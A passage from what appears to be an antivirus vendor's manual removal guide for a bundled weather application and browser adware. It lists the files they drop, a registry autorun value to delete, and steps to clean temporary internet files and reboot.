      %Documents and Settings%\All Users\Application Data\worldweather\WeatherContext\WeatherContext.db.!mv (509 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\369.ico.!mv (16369 bytes)
      %Documents and Settings%\%current user%\Cookies\JB38A659.txt (102 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\367[1].ico (1177 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\btn_min.jpg (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\1.jpg (1552 bytes)
      %Program Files%\worldweather\5.0.0.5002\PM10.5002.exe (7192 bytes)
      %Program Files%\worldweather\5.0.0.5002\updateContext\loading.gif (8 bytes)
      %Program Files%\worldweather\5.0.0.5002\weather.db (6584 bytes)
      %Program Files%\worldweather\5.0.0.5002\uninst.exe (2251 bytes)
      %Program Files%\worldweather\5.0.0.5002\updateContext\un_update.html (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\btn_next.bmp (2392 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\bg.bmp (18424 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\btn_move.jpg (1 bytes)
      %Program Files%\worldweather\5.0.0.5002\areacode.db (3 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\2.jpg (1552 bytes)
      %Program Files%\worldweather\5.0.0.5002\updateContext\update.html (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\checkbox2.bmp (2 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\future\n99.png (6 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\checkbox1.bmp (2 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\future\tips.ico (1856 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\btn_setting.jpg (3 bytes)
      %Program Files%\worldweather\5.0.0.5002\updateContext\i.gif (170 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\err.png (784 bytes)
      %Program Files%\worldweather\5.0.0.5002\updateContext\updateRecord.db (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\loading1.bmp (696 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\min.png (440 bytes)
      %Program Files%\worldweather\5.0.0.5002\sqliteApi.dll (784 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsu4.tmp (80589 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\inetc.dll (784 bytes)
      %Program Files%\worldweather\5.0.0.5002\sqlite3.dll (20416 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\SkinBtn.dll (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\btn_complete.bmp (2392 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\btn_max.jpg (3 bytes)
      %Program Files%\worldweather\5.0.0.5002\worldWeatherRealTime5002.exe (4992 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\bg_small.png (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\KillProcDLL.dll (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\tongji.html (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\nsWindows.dll (10 bytes)
      %Documents and Settings%\All Users\Start Menu\Programs\worldweather\大众天气预报卸载.lnk (911 bytes)
      %Program Files%\worldweather\5.0.0.5002\worldweather.exe (19096 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\loading.png (3 bytes)
      %Documents and Settings%\All Users\Start Menu\Programs\worldweather\大众天气预报.lnk (943 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\large\n99.png (784 bytes)
      %Program Files%\worldweather\5.0.0.5002\AQI.5002.exe (7192 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\btn_close.bmp (1 bytes)
      %Program Files%\worldweather\5.0.0.5002\WeatherContext\WeatherContext.db (352 bytes)
      %Program Files%\worldweather\5.0.0.5002\worldWeatherUpdate.5002.exe (11344 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\tongji_61[1].htm (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\ToggleImages.html (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\System.dll (11 bytes)
      %Program Files%\worldweather\5.0.0.5002\PM25.5002.exe (11344 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\3.jpg (1552 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\nsDialogs.dll (9 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\md5dll.dll (8 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\bg_large.png (9 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\kz.png (3 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\close.png (873 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\skin.xml (6 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\default\btn_close.jpg (3 bytes)
      %Program Files%\worldweather\5.0.0.5002\skins\common\topbar.png (3 bytes)
      %Program Files%\worldweather\5.0.0.5002\mfc5002.dll (5520 bytes)
      %Documents and Settings%\All Users\Application Data\worldweather\updateContext\updateRecord.db (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsf5.tmp\loading2.bmp (696 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\123_sogou_com[1] (10094 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\123_sogou_com[1].txt (14600 bytes)
      %Program Files%\greeou\profile\Defaults\config.ini (4 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
      %Program Files%\greeou\profile\Defaults\last.ini (1134 bytes)
      %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\搜狗高速上网.lnk (1 bytes)
      %Documents and Settings%\All Users\Application Data\367.ico (9 bytes)
      %WinDir%\Microsoft.NET\Framework\v4.0.30319\ngen_service.log (848 bytes)
      %Program Files%\greeou\skin\Default\control\tab_hover.png (346 bytes)
      %Program Files%\greeou\skin\Default\control\tab_bg.png (314 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_new3.png (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\open.ini (3 bytes)
      %Program Files%\greeou\skin\Default\misc\16_ad_hunter.png (716 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\365weatherIns_61.exe (114375 bytes)
      %Program Files%\greeou\profile\Template\start\style.css (3 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_back3.png (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\NSISdl.dll (14 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_favorites2.png (696 bytes)
      %Program Files%\greeou\skin\Default\control\MenuItem_Hover.png (2 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
      %Program Files%\greeou\skin\Default\misc\24_go.png (650 bytes)
      %Program Files%\greeou\skin\Default\shared\16_new.png (650 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_favorites.png (700 bytes)
      %Program Files%\greeou\profile\Defaults\CommandBars.ini (1 bytes)
      %Program Files%\greeou\skin\Default\mskin.ini (10 bytes)
      %Program Files%\greeou\GreenDou.exe (25123 bytes)
      %Program Files%\greeou\skin\Default\control\status_bar_bg.png (445 bytes)
      %Program Files%\greeou\skin\Default\control\combo_dropdown_hover.png (774 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_forward.png (947 bytes)
      %Program Files%\greeou\skin\Default\control\win_minimize.png (202 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_refresh.png (1 bytes)
      %Program Files%\greeou\skin\Default\control\combo_dropdown.png (794 bytes)
      %Program Files%\greeou\profile\Template\start\images\logo.gif (3 bytes)
      %Program Files%\greeou\skin\Default\control\Button_Pressed.png (1 bytes)
      %Program Files%\greeou\profile\Template\start\index.html (832 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_home.png (1 bytes)
      %Program Files%\greeou\skin\Default\misc\16_website_info.png (1 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_new.png (879 bytes)
      %Program Files%\greeou\skin\Default\control\title_bg.png (655 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_home2.png (1 bytes)
      %Program Files%\greeou\profile\Template\start\images\header_logo.gif (2 bytes)
      %Program Files%\greeou\skin\Default\shared\16_edit.png (646 bytes)
      %Program Files%\greeou\skin\Default\control\tab_sidebar.png (321 bytes)
      %Program Files%\greeou\profile\SearchEngine\config.ini (226 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_new2.png (801 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_page_zoom2.png (724 bytes)
      %Program Files%\greeou\profile\Template\start\images\dian.gif (376 bytes)
      %Program Files%\greeou\skin\Default\control\win_close.png (362 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_refresh2.png (1 bytes)
      %Program Files%\greeou\profile\Template\start\images\header_bg.gif (83 bytes)
      %Program Files%\greeou\skin\Default\control\tab_active.png (1 bytes)
      %Program Files%\greeou\skin\Default\control\mainframe.png (288 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_back2.png (1 bytes)
      %Program Files%\greeou\skin\Default\control\tab_inactive.png (281 bytes)
      %Program Files%\greeou\skin\Default\control\sidebar_tab_inactive.png (259 bytes)
      %Program Files%\greeou\skin\Default\misc\16_folder_open.png (614 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_search.png (871 bytes)
      %Program Files%\greeou\skin\Default\control\combosearch_dropdown.png (794 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_stop2.png (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\setup_a7158.exe (3004 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\xID.dll (3 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_search2.png (969 bytes)
      %Program Files%\greeou\skin\Default\control\win_maximum.png (275 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_new.png (637 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_page_zoom.png (733 bytes)
      %Program Files%\greeou\skin\Default\control\tab_sidebar_hover.png (322 bytes)
      %Program Files%\greeou\skin\Default\control\Button_Hover.png (1 bytes)
      %Program Files%\greeou\skin\Default\control\progress.png (708 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_back.png (953 bytes)
      %Program Files%\greeou\skin\Default\control\combo.png (260 bytes)
      %Program Files%\greeou\profile\SearchEngine\google.ico (1 bytes)
      %Program Files%\greeou\skin\Default\control\tab_new.png (350 bytes)
      %Program Files%\greeou\skin\Default\control\combosearch_dropdown_hover.png (774 bytes)
      %Program Files%\greeou\profile\Template\start\left.html (1 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\setup_3128.exe (125242 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\nsRandom.dll (935 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_forward2.png (1 bytes)
      %Program Files%\greeou\skin\Default\control\skin_selector.png (283 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\Md5dll.dll (8 bytes)
      %Program Files%\greeou\skin\Default\control\win_restore.png (302 bytes)
      %Program Files%\greeou\skin\Default\control\Button_Checked.png (976 bytes)
      %Program Files%\greeou\skin\Default\misc\16_page.png (519 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\processwork.dll (6140 bytes)
      %Program Files%\greeou\skin\Default\control\tab_close.png (259 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_history2.png (994 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_undo2.png (840 bytes)
      %Program Files%\greeou\skin\Default\control\tab_new_hover.png (346 bytes)
      %Program Files%\greeou\profile\SearchEngine\taobao.ico (1 bytes)
      %Program Files%\greeou\skin\Default\control\sidebar_tab_active.png (957 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_new2.png (1 bytes)
      %Program Files%\greeou\skin\Default\misc\16_folder_closed.png (587 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\System.dll (11 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_stop.png (1 bytes)
      %Program Files%\greeou\skin\Default\misc\16_open_in_bg.png (507 bytes)
      %Documents and Settings%\%current user%\Start Menu\Programs\绿豆浏览器\绿豆浏览器.lnk (678 bytes)
      %Documents and Settings%\%current user%\Local Settings\Temp\nsp2.tmp\Inetc.dll (20 bytes)
      %Documents and Settings%\%current user%\Desktop\绿豆浏览器.lnk (666 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_history.png (847 bytes)
      %Program Files%\greeou\skin\Default\toolbar\16_undo.png (748 bytes)
      %Program Files%\greeou\profile\SearchEngine\baidu.ico (2 bytes)
      %Program Files%\greeou\skin\Default\misc\24_go2.png (648 bytes)
      %Program Files%\greeou\skin\Default\control\combo_hover.png (261 bytes)
      %Program Files%\greeou\skin\Default\control\tab_close_hover.png (2 bytes)
      %Program Files%\greeou\profile\Defaults\searchkeys.ini (14 bytes)
      %Program Files%\greeou\skin\Default\toolbar\24_forward3.png (1 bytes)
      %Program Files%\greeou\ico\taobao.ico (2104 bytes)
      %Program Files%\greeou\skin\Default\misc\16_open_in_new.png (548 bytes)
      %Program Files%\greeou\profile\Template\start\images\logo2.gif (596 bytes)

    4. Delete the following value(s) in the autorun key (How to Work with System Registry):

      [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
      "worldweather5002" = "%Program Files%\worldweather\5.0.0.5002\worldweather.exe /autorun"

    5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. Reboot the computer.

    *Manual removal may cause unexpected system behaviour and should be performed at your own risk.
